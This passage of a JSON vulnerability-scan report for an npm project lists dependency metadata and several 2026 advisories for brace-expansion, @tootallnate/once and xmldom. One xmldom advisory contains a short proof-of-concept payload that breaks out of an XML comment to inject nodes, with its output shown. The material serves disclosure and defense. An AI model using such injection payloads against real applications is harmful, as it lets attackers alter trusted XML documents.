"DependsOn": [ "available-typed-arrays@1.0.7", "call-bind@1.0.8", "call-bound@1.0.4", "for-each@0.3.5", "get-proto@1.0.1", "gopd@1.2.0", "has-tostringtag@1.0.2" ], "Locations": [ { "StartLine": 21321, "EndLine": 21341 } ], "AnalyzedBy": "npm" }, { "ID": "wide-align@1.1.5", "Name": "wide-align", "Identifier": { "PURL": "pkg:npm/wide-align@1.1.5", "UID": "27a0eb9c97bd817c" }, "Version": "1.1.5", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "string-width@4.2.3" ], "Locations": [ { "StartLine": 21342, "EndLine": 21350 } ], "AnalyzedBy": "npm" }, { "ID": "wrap-ansi@6.2.0", "Name": "wrap-ansi", "Identifier": { "PURL": "pkg:npm/wrap-ansi@6.2.0", "UID": "78c5306ab439108e" }, "Version": "6.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ansi-styles@4.3.0", "string-width@4.2.3", "strip-ansi@6.0.1" ], "Locations": [ { "StartLine": 12003, "EndLine": 12017 } ], "AnalyzedBy": "npm" }, { "ID": "wrap-ansi@7.0.0", "Name": "wrap-ansi", "Identifier": { "PURL": "pkg:npm/wrap-ansi@7.0.0", "UID": "9206818c7cc6ce85" }, "Version": "7.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ansi-styles@4.3.0", "string-width@4.2.3", "strip-ansi@6.0.1" ], "Locations": [ { "StartLine": 15885, "EndLine": 15903 }, { "StartLine": 21361, "EndLine": 21377 }, { "StartLine": 21378, "EndLine": 21395 } ], "AnalyzedBy": "npm" }, { "ID": "wrap-ansi@8.1.0", "Name": "wrap-ansi", "Identifier": { "PURL": "pkg:npm/wrap-ansi@8.1.0", "UID": "58a8b6f3c08660dd" }, "Version": "8.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ansi-styles@6.2.3", "string-width@5.1.2", "strip-ansi@7.1.2" ], "Locations": [ { "StartLine": 3390, "EndLine": 3406 }, { "StartLine": 15867, "EndLine": 15884 } ], "AnalyzedBy": "npm" }, { "ID": "wrappy@1.0.2", "Name": "wrappy", "Identifier": { "PURL": "pkg:npm/wrappy@1.0.2", "UID": "d2a2030c3e6a233c" }, "Version": "1.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 21396, "EndLine": 21401 } ], "AnalyzedBy": "npm" }, { "ID": "write-file-atomic@4.0.2", "Name": "write-file-atomic", "Identifier": { "PURL": "pkg:npm/write-file-atomic@4.0.2", "UID": "c325b9bcd37cbb2e" }, "Version": "4.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "imurmurhash@0.1.4", "signal-exit@3.0.7" ], "Locations": [ { "StartLine": 21402, "EndLine": 21414 } ], "AnalyzedBy": "npm" }, { "ID": "write-file-atomic@6.0.0", "Name": "write-file-atomic", "Identifier": { "PURL": "pkg:npm/write-file-atomic@6.0.0", "UID": "9a4d7dd4aaf747cb" }, "Version": "6.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "imurmurhash@0.1.4", "signal-exit@4.1.0" ], "Locations": [ { "StartLine": 15970, "EndLine": 15981 } ], "AnalyzedBy": "npm" }, { "ID": "ws@6.2.3", "Name": "ws", "Identifier": { "PURL": "pkg:npm/ws@6.2.3", "UID": "7197e85279f59780" }, "Version": "6.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "async-limiter@1.0.1" ], "Locations": [ { "StartLine": 21415, "EndLine": 21423 } ], "AnalyzedBy": "npm" }, { "ID": "ws@7.5.10", "Name": "ws", "Identifier": { "PURL": "pkg:npm/ws@7.5.10", "UID": "4026c8326f0d9d85" }, "Version": "7.5.10", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 12722, "EndLine": 12742 }, { "StartLine": 17186, "EndLine": 17206 } ], "AnalyzedBy": "npm" }, { "ID": "x-path@0.0.2", "Name": "x-path", "Identifier": { "PURL": "pkg:npm/x-path@0.0.2", "UID": "99d92e4870dc0df5" }, "Version": "0.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "path-extra@1.0.3" ], "Locations": [ { "StartLine": 21424, "EndLine": 21432 } ], "AnalyzedBy": "npm" }, { "ID": "xcode@2.1.0", "Name": "xcode", "Identifier": { "PURL": "pkg:npm/xcode@2.1.0", "UID": "c60c39ac6bb2e487" }, "Version": "2.1.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "simple-plist@1.3.1", "uuid@3.4.0" ], "Locations": [ { "StartLine": 17459, "EndLine": 17471 } ], "AnalyzedBy": "npm" }, { "ID": "xcode@3.0.1", "Name": "xcode", "Identifier": { "PURL": "pkg:npm/xcode@3.0.1", "UID": "f3daf23ade4d3136" }, "Version": "3.0.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "simple-plist@1.3.1", "uuid@7.0.3" ], "Locations": [ { "StartLine": 21433, "EndLine": 21445 } ], "AnalyzedBy": "npm" }, { "ID": "xml-formatter@3.6.7", "Name": "xml-formatter", "Identifier": { "PURL": "pkg:npm/xml-formatter@3.6.7", "UID": "8b604ae27eb0421b" }, "Version": "3.6.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "xml-parser-xo@4.1.5" ], "Locations": [ { "StartLine": 21446, "EndLine": 21457 } ], "AnalyzedBy": "npm" }, { "ID": "xml-parser-xo@4.1.5", "Name": "xml-parser-xo", "Identifier": { "PURL": "pkg:npm/xml-parser-xo@4.1.5", "UID": "40475f5fc6e532d8" }, "Version": "4.1.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 21458, "EndLine": 21466 } ], "AnalyzedBy": "npm" }, { "ID": "xml2js@0.6.0", "Name": "xml2js", "Identifier": { "PURL": "pkg:npm/xml2js@0.6.0", "UID": "5b7968e8f0515a62" }, "Version": "0.6.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "sax@1.4.1", "xmlbuilder@11.0.1" ], "Locations": [ { "StartLine": 21467, "EndLine": 21479 } ], "AnalyzedBy": "npm" }, { "ID": "xmlbuilder@11.0.1", "Name": "xmlbuilder", "Identifier": { "PURL": "pkg:npm/xmlbuilder@11.0.1", "UID": "bc3fe4c2648ced2c" }, "Version": "11.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 21480, "EndLine": 21488 } ], "AnalyzedBy": "npm" }, { "ID": "xmlbuilder@15.1.1", "Name": "xmlbuilder", "Identifier": { "PURL": "pkg:npm/xmlbuilder@15.1.1", "UID": "3cc55ec1c254330a" }, "Version": "15.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 21489, "EndLine": 21497 } ], "AnalyzedBy": "npm" }, { "ID": "y18n@4.0.3", "Name": "y18n", "Identifier": { "PURL": "pkg:npm/y18n@4.0.3", "UID": "449b6aa4fdad1b10" }, "Version": "4.0.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 12018, "EndLine": 12024 } ], "AnalyzedBy": "npm" }, { "ID": "y18n@5.0.8", "Name": "y18n", "Identifier": { "PURL": "pkg:npm/y18n@5.0.8", "UID": "25531c7b6dc3d940" }, "Version": "5.0.8", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 21498, "EndLine": 21506 } ], "AnalyzedBy": "npm" }, { "ID": "yallist@3.1.1", "Name": "yallist", "Identifier": { "PURL": "pkg:npm/yallist@3.1.1", "UID": "25dabec4c7b9387d" }, "Version": "3.1.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 21507, "EndLine": 21512 } ], "AnalyzedBy": "npm" }, { "ID": "yallist@4.0.0", "Name": "yallist", "Identifier": { "PURL": "pkg:npm/yallist@4.0.0", "UID": "4e5463d284ce43d2" }, "Version": "4.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6878, "EndLine": 6884 }, { "StartLine": 9528, "EndLine": 9534 }, { "StartLine": 10036, "EndLine": 10041 }, { "StartLine": 12214, "EndLine": 12220 }, { "StartLine": 12904, "EndLine": 12910 }, { "StartLine": 12942, "EndLine": 12948 }, { "StartLine": 12975, "EndLine": 12981 }, { "StartLine": 13008, "EndLine": 13014 }, { "StartLine": 13041, "EndLine": 13047 }, { "StartLine": 13075, "EndLine": 13081 }, { "StartLine": 15982, "EndLine": 15988 }, { "StartLine": 19960, "EndLine": 19966 }, { "StartLine": 20514, "EndLine": 20520 } ], "AnalyzedBy": "npm" }, { "ID": "yallist@5.0.0", "Name": "yallist", "Identifier": { "PURL": "pkg:npm/yallist@5.0.0", "UID": "47cb8de25b79f357" }, "Version": "5.0.0", "Licenses": [ "BlueOak-1.0.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 15697, "EndLine": 15704 } ], "AnalyzedBy": "npm" }, { "ID": "yaml@2.8.1", "Name": "yaml", "Identifier": { "PURL": "pkg:npm/yaml@2.8.1", "UID": "37f4ea3e7440d092" }, "Version": "2.8.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 21513, "EndLine": 21524 } ], "AnalyzedBy": "npm" }, { "ID": "yargs@15.4.1", "Name": "yargs", "Identifier": { "PURL": "pkg:npm/yargs@15.4.1", "UID": "7ab750adb3eb2f6e" }, "Version": "15.4.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "cliui@6.0.0", "decamelize@1.2.0", "find-up@4.1.0", "get-caller-file@2.0.5", "require-directory@2.1.1", "require-main-filename@2.0.0", "set-blocking@2.0.0", "string-width@4.2.3", "which-module@2.0.1", "y18n@4.0.3", "yargs-parser@18.1.3" ], "Locations": [ { "StartLine": 12025, "EndLine": 12047 } ], "AnalyzedBy": "npm" }, { "ID": "yargs@16.2.0", "Name": "yargs", "Identifier": { "PURL": "pkg:npm/yargs@16.2.0", "UID": "7a1f8ab1d0ad7cc0" }, "Version": "16.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "cliui@7.0.4", "escalade@3.2.0", "get-caller-file@2.0.5", "require-directory@2.1.1", "string-width@4.2.3", "y18n@5.0.8", "yargs-parser@20.2.9" ], "Locations": [ { "StartLine": 18506, "EndLine": 18523 } ], "AnalyzedBy": "npm" }, { "ID": "yargs@17.7.2", "Name": "yargs", "Identifier": { "PURL": "pkg:npm/yargs@17.7.2", "UID": "f228b296bb34999" }, "Version": "17.7.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "cliui@8.0.1", "escalade@3.2.0", "get-caller-file@2.0.5", "require-directory@2.1.1", "string-width@4.2.3", "y18n@5.0.8", "yargs-parser@21.1.1" ], "Locations": [ { "StartLine": 21525, "EndLine": 21542 } ], "AnalyzedBy": "npm" }, { "ID": "yargs-parser@18.1.3", "Name": "yargs-parser", "Identifier": { "PURL": "pkg:npm/yargs-parser@18.1.3", "UID": "7f41f342fea7a5f3" }, "Version": "18.1.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "camelcase@5.3.1", "decamelize@1.2.0" ], "Locations": [ { "StartLine": 12048, "EndLine": 12061 } ], "AnalyzedBy": "npm" }, { "ID": "yargs-parser@20.2.9", "Name": "yargs-parser", "Identifier": { "PURL": "pkg:npm/yargs-parser@20.2.9", "UID": "904791dd3365191f" }, "Version": "20.2.9", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 12354, "EndLine": 12362 }, { "StartLine": 18524, "EndLine": 18532 } ], "AnalyzedBy": "npm" }, { "ID": "yargs-parser@21.1.1", "Name": "yargs-parser", "Identifier": { "PURL": "pkg:npm/yargs-parser@21.1.1", "UID": "a8317e8b6e326666" }, "Version": "21.1.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 21543, "EndLine": 21551 } ], "AnalyzedBy": "npm" }, { "ID": "yocto-queue@0.1.0", "Name": "yocto-queue", "Identifier": { "PURL": "pkg:npm/yocto-queue@0.1.0", "UID": "abf88c15000a0365" }, "Version": "0.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 21552, "EndLine": 21563 } ], "AnalyzedBy": "npm" } ], "Vulnerabilities": [ { "VulnerabilityID": "CVE-2026-25547", "VendorIDs": [ "GHSA-7h2j-956f-4vf2" ], "PkgID": "@isaacs/brace-expansion@5.0.0", "PkgName": "@isaacs/brace-expansion", "PkgIdentifier": { "PURL": "pkg:npm/%40isaacs/brace-expansion@5.0.0", "UID": "8e954b8711d9795" }, "InstalledVersion": "5.0.0", "FixedVersion": "5.0.1", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-25547", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:14511cca8a4cba6240f34ccda2eb1a2ee09e35603ce69ca1223172fd6a0b99e1", "Title": "brace-expansion: brace-expansion: Denial of Service via unbounded brace range expansion", "Description": "@isaacs/brace-expansion is a hybrid CJS/ESM TypeScript fork of brace-expansion. Prior to version 5.0.1, @isaacs/brace-expansion is vulnerable to a denial of service (DoS) issue caused by unbounded brace range expansion. When an attacker provides a pattern containing repeated numeric brace ranges, the library attempts to eagerly generate every possible combination synchronously. Because the expansion grows exponentially, even a small input can consume excessive CPU and memory and may crash the Node.js process. This issue has been patched in version 5.0.1.", "Severity": "HIGH", "CweIDs": [ "CWE-1333" ], "VendorSeverity": { "alma": 3, "ghsa": 3, "oracle-oval": 3, "redhat": 2, "rocky": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", "V40Score": 8.7 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "V3Score": 6.5 } }, "References": [ "https://access.redhat.com/errata/RHSA-2026:7350", "https://access.redhat.com/security/cve/CVE-2026-25547", "https://bugzilla.redhat.com/2431340", "https://bugzilla.redhat.com/2436942", "https://bugzilla.redhat.com/2441268", "https://bugzilla.redhat.com/2447140", "https://bugzilla.redhat.com/2447141", "https://bugzilla.redhat.com/2447142", "https://bugzilla.redhat.com/2447143", "https://bugzilla.redhat.com/2447144", "https://bugzilla.redhat.com/2447145", "https://bugzilla.redhat.com/2448754", "https://bugzilla.redhat.com/2453037", "https://bugzilla.redhat.com/2453151", "https://bugzilla.redhat.com/2453152", "https://bugzilla.redhat.com/2453157", "https://bugzilla.redhat.com/2453158", "https://bugzilla.redhat.com/2453160", "https://bugzilla.redhat.com/2453161", "https://bugzilla.redhat.com/2453162", "https://bugzilla.redhat.com/show_bug.cgi?id=2431340", "https://bugzilla.redhat.com/show_bug.cgi?id=2436942", "https://bugzilla.redhat.com/show_bug.cgi?id=2441268", "https://bugzilla.redhat.com/show_bug.cgi?id=2447140", "https://bugzilla.redhat.com/show_bug.cgi?id=2447141", "https://bugzilla.redhat.com/show_bug.cgi?id=2447142", "https://bugzilla.redhat.com/show_bug.cgi?id=2447143", "https://bugzilla.redhat.com/show_bug.cgi?id=2447144", "https://bugzilla.redhat.com/show_bug.cgi?id=2447145", "https://bugzilla.redhat.com/show_bug.cgi?id=2448754", "https://bugzilla.redhat.com/show_bug.cgi?id=2453037", "https://bugzilla.redhat.com/show_bug.cgi?id=2453151", "https://bugzilla.redhat.com/show_bug.cgi?id=2453152", "https://bugzilla.redhat.com/show_bug.cgi?id=2453157", "https://bugzilla.redhat.com/show_bug.cgi?id=2453158", "https://bugzilla.redhat.com/show_bug.cgi?id=2453160", "https://bugzilla.redhat.com/show_bug.cgi?id=2453161", "https://bugzilla.redhat.com/show_bug.cgi?id=2453162", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1525", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1526", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1527", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1528", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21637", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21711", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21712", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21713", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21714", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21715", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21716", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21717", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2229", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25547", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2581", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135", "https://errata.almalinux.org/9/ALSA-2026-7350.html", "https://errata.rockylinux.org/RLSA-2026:7350", "https://github.com/isaacs/brace-expansion", "https://github.com/isaacs/brace-expansion/security/advisories/GHSA-7h2j-956f-4vf2", "https://linux.oracle.com/cve/CVE-2026-25547.html", "https://linux.oracle.com/errata/ELSA-2026-7675.html", "https://nvd.nist.gov/vuln/detail/CVE-2026-25547", "https://www.cve.org/CVERecord?id=CVE-2026-25547" ], "PublishedDate": "2026-02-04T22:16:00.813Z", "LastModifiedDate": "2026-04-15T00:35:42.02Z" }, { "VulnerabilityID": "CVE-2026-3449", "VendorIDs": [ "GHSA-vpq2-c234-7xj6" ], "PkgID": "@tootallnate/once@1.1.2", "PkgName": "@tootallnate/once", "PkgIdentifier": { "PURL": "pkg:npm/%40tootallnate/once@1.1.2", "UID": "31254e5ee78ef763" }, "InstalledVersion": "1.1.2", "FixedVersion": "3.0.1", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-3449", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:704ddd6b90b90bcd039c39c4374a5015338748c0e25893761132d379dad69579", "Title": "@tootallnate/once: @tootallnate/once: Denial of Service due to incorrect control flow scoping with AbortSignal", "Description": "Versions of the package @tootallnate/once before 3.0.1 are vulnerable to Incorrect Control Flow Scoping in promise resolving when AbortSignal option is used. The Promise remains in a permanently pending state after the signal is aborted, causing any await or .then() usage to hang indefinitely. This can cause a control-flow leak that can lead to stalled requests, blocked workers, or degraded application availability.", "Severity": "LOW", "CweIDs": [ "CWE-705" ], "VendorSeverity": { "ghsa": 1, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P", "V3Score": 3.3, "V40Score": 1.9 }, "redhat": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "V3Score": 4 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-3449", "https://github.com/TooTallNate/once", "https://github.com/TooTallNate/once/commit/b9f43cc5259bee2952d91ad3cdbd201a82df448a", "https://github.com/TooTallNate/once/issues/8", "https://nvd.nist.gov/vuln/detail/CVE-2026-3449", "https://security.snyk.io/vuln/SNYK-JS-TOOTALLNATEONCE-15250612", "https://www.cve.org/CVERecord?id=CVE-2026-3449" ], "PublishedDate": "2026-03-03T05:17:25.017Z", "LastModifiedDate": "2026-03-03T21:52:29.877Z" }, { "VulnerabilityID": "CVE-2026-34601", "VendorIDs": [ "GHSA-wh4c-j3r5-mjhp" ], "PkgID": "@xmldom/xmldom@0.8.11", "PkgName": "@xmldom/xmldom", "PkgIdentifier": { "PURL": "pkg:npm/%40xmldom/xmldom@0.8.11", "UID": "f9e98e014475aea3" }, "InstalledVersion": "0.8.11", "FixedVersion": "0.8.12, 0.9.9", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-34601", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:821a2d3faaeb49e19bc0a3ad11b036b9e537cdf7572bc0b774691ad8e2dab449", "Title": "xmldom: xmldom: XML structure injection via CDATA terminator", "Description": "xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) `DOMParser` and `XMLSerializer` module. In xmldom versions 0.6.0 and prior and @xmldom/xmldom prior to versions 0.8.12 and 0.9.9, xmldom/xmldom allows attacker-controlled strings containing the CDATA terminator ]]\u003e to be inserted into a CDATASection node. During serialization, XMLSerializer emitted the CDATA content verbatim without rejecting or safely splitting the terminator. As a result, data intended to remain text-only became active XML markup in the serialized output, enabling XML structure injection and downstream business-logic manipulation. This issue has been patched in xmldom version 0.6.0 and @xmldom/xmldom versions 0.8.12 and 0.9.9.", "Severity": "HIGH", "CweIDs": [ "CWE-91" ], "VendorSeverity": { "ghsa": 3, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-34601", "https://github.com/xmldom/xmldom", "https://github.com/xmldom/xmldom/commit/2b852e836ab86dbbd6cbaf0537f584dd0b5ac184", "https://github.com/xmldom/xmldom/releases/tag/0.8.12", "https://github.com/xmldom/xmldom/releases/tag/0.9.9", "https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp", "https://nvd.nist.gov/vuln/detail/CVE-2026-34601", "https://www.cve.org/CVERecord?id=CVE-2026-34601" ], "PublishedDate": "2026-04-02T18:16:31.933Z", "LastModifiedDate": "2026-04-16T14:57:08.337Z" }, { "VulnerabilityID": "CVE-2026-41672", "VendorIDs": [ "GHSA-j759-j44w-7fr8" ], "PkgID": "@xmldom/xmldom@0.8.11", "PkgName": "@xmldom/xmldom", "PkgIdentifier": { "PURL": "pkg:npm/%40xmldom/xmldom@0.8.11", "UID": "f9e98e014475aea3" }, "InstalledVersion": "0.8.11", "FixedVersion": "0.8.13, 0.9.10", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41672", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:6496770dac62da2ed86a098fe21f3cd0f1a165bc140a78c2998df8f417b6d30d", "Title": "xmldom has XML node injection through unvalidated comment serialization", "Description": "## Summary\n\nThe package allows attacker-controlled comment content to be serialized into XML without validating or neutralizing comment breaking sequences. As a result, an attacker can terminate the comment early and inject arbitrary XML nodes into the serialized output.\n\n---\n\n## Details\n\nThe issue is in the DOM construction and serialization flow for comment nodes.\n\nWhen `createComment(data)` is called, the supplied string is stored as comment data through the generic character-data handling path. That content is kept as-is. Later, when the document is serialized, the serializer writes comment nodes by concatenating the XML comment delimiters with the stored `node.data` value directly.\n\nThat behavior is unsafe because XML comments are a syntax-sensitive context. If attacker-controlled input contains a sequence that closes the comment, the serializer does not preserve it as literal comment text. Instead, it emits output where the remainder of the payload is treated as live XML markup.\n\nThis is a real injection bug, not a formatting issue. The serializer already applies context-aware handling in other places, such as escaping text nodes and rewriting unsafe CDATA terminators. Comment content does not receive equivalent treatment. Because of that gap, untrusted data can break out of the comment boundary and modify the structure of the final XML document.\n\n---\n\n## PoC\n\n```js\nconst { DOMImplementation, DOMParser, XMLSerializer } = require('@xmldom/xmldom');\n\nconst doc = new DOMImplementation().createDocument(null, 'root', null);\n\ndoc.documentElement.appendChild(\n doc.createComment('--\u003e\u003cinjected attr=\"1\"/\u003e\u003c!--')\n);\n\nconst xml = new XMLSerializer().serializeToString(doc);\nconsole.log(xml);\n// \u003croot\u003e\u003c!----\u003e\u003cinjected attr=\"1\"/\u003e\u003c!----\u003e\u003c/root\u003e\n\nconst reparsed = new DOMParser().parseFromString(xml, 'text/xml');\nconsole.log(reparsed.documentElement.childNodes.item(1).nodeName);\n// injected\n```\n\n---\n\n## Impact\n\nAn application that uses the package to build XML from untrusted input can be made to emit attacker-controlled elements outside the intended comment boundary. That allows the attacker to alter the meaning and structure of generated XML documents.\n\nIn practice, this can affect any workflow that generates XML and then stores it, forwards it, signs it, or hands it to another parser. Realistic targets include XML-based configuration, policy documents, and message formats where downstream consumers trust the serialized structure.\n\n---\n\n## Disclosure\n\nThis vulnerability was publicly disclosed at 2026-04-06T11:25:07Z via [xmldom/xmldom#987](https://github.com/xmldom/xmldom/pull/987), which was subsequently closed without being merged.\n\n---\n\n## Fix Applied\n\n\u003e **⚠ Opt-in required.** Protection is not automatic. Existing serialization calls remain\n\u003e vulnerable unless `{ requireWellFormed: true }` is explicitly passed. Applications that pass\n\u003e untrusted data to `createComment()` or mutate comment nodes with untrusted input (via\n\u003e `appendData`, `insertData`, `replaceData`, `.data =`, or `.textContent =`) should audit all\n\u003e `serializeToString()` call sites and add the option.\n\n`XMLSerializer.serializeToString()` now accepts an options object as a second argument. When `{ requireWellFormed: true }` is passed, the serializer throws `InvalidStateError` before emitting a Comment node whose `.data` would produce malformed XML.\n\nOn `@xmldom/xmldom` ≥ 0.9.10, the full W3C DOM Parsing §3.2.1.4 check is applied: throws if `.data` contains `--` anywhere, ends with `-`, or contains characters outside the XML Char production.\n\nOn `@xmldom/xmldom` ≥ 0.8.13 (LTS), only the `--\u003e` injection sequence is checked. The `0.8.x` SAX parser accepts comments containing `--` (without `\u003e`), so throwing on bare `--` would break a previously-working round-trip on that branch. The `--\u003e` check is sufficient to prevent injection.\n\n### PoC — fixed path\n\n```js\nconst { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');\n\nconst doc = new DOMImplementation().createDocument(null, 'root', null);\ndoc.documentElement.appendChild(doc.createComment('--\u003e\u003cinjected attr=\"1\"/\u003e\u003c!--'));\n\n// Default (unchanged): verbatim — injection present\nconst unsafe = new XMLSerializer().serializeToString(doc);\nconsole.log(unsafe);\n// \u003croot\u003e\u003c!----\u003e\u003cinjected attr=\"1\"/\u003e\u003c!----\u003e\u003c/root\u003e\n\n// Opt-in guard: throws InvalidStateError before serializing\ntry {\n new XMLSerializer().serializeToString(doc, { requireWellFormed: true });\n} catch (e) {\n console.log(e.name, e.message);\n // InvalidStateError: The comment node data contains \"--\" or ends with \"-\" (0.9.x)\n // InvalidStateError: The comment node data contains \"--\u003e\" (0.8.x — only --\u003e is checked)\n}\n```\n\n### Why the default stays verbatim\n\nThe W3C DOM Parsing and Serialization spec §3.2.1.4 defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the spec explicitly permits serializing ill-formed comment content verbatim — this is also the behavior of browser implementations (Chrome, Firefox, Safari): `new XMLSerializer().serializeToString(doc)` produces the injection sequence without error in all major browsers.\n\nUnconditionally throwing would be a behavioral breaking change with no spec justification. The opt-in `requireWellFormed: true` flag allows applications that require injection safety to enable strict mode without breaking existing deployments.\n\n### Residual limitation\n\nThe fix operates at serialization time only. There is no creation-time check in `createComment` — the spec does not require one for comment data. Any path that leads to a Comment node with `--` in its data (`createComment`, `appendData`, `.data =`, etc.) produces a node that serializes safely only when `{ requireWellFormed: true }` is passed to `serializeToString`.", "Severity": "HIGH", "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N", "V40Score": 8.7 } }, "References": [ "https://github.com/xmldom/xmldom", "https://github.com/xmldom/xmldom/commit/b397540889086da868c30c366ad5c220d1a750c7", "https://github.com/xmldom/xmldom/commit/fda7cc313de30243fea35cada64e0bb12099c2a1", "https://github.com/xmldom/xmldom/pull/987", "https://github.com/xmldom/xmldom/releases/tag/0.8.13", "https://github.com/xmldom/xmldom/releases/tag/0.9.10", "https://github.com/xmldom/xmldom/security/advisories/GHSA-j759-j44w-7fr8" ] }, { "VulnerabilityID": "CVE-2026-41673", "VendorIDs": [ "GHSA-2v35-w6hq-6mfw" ], "PkgID": "@xmldom/xmldom@0.8.11", "PkgName": "@xmldom/xmldom", "PkgIdentifier": { "PURL": "pkg:npm/%40xmldom/xmldom@0.8.11", "UID": "f9e98e014475aea3" }, "InstalledVersion": "0.8.11", "FixedVersion": "0.8.13, 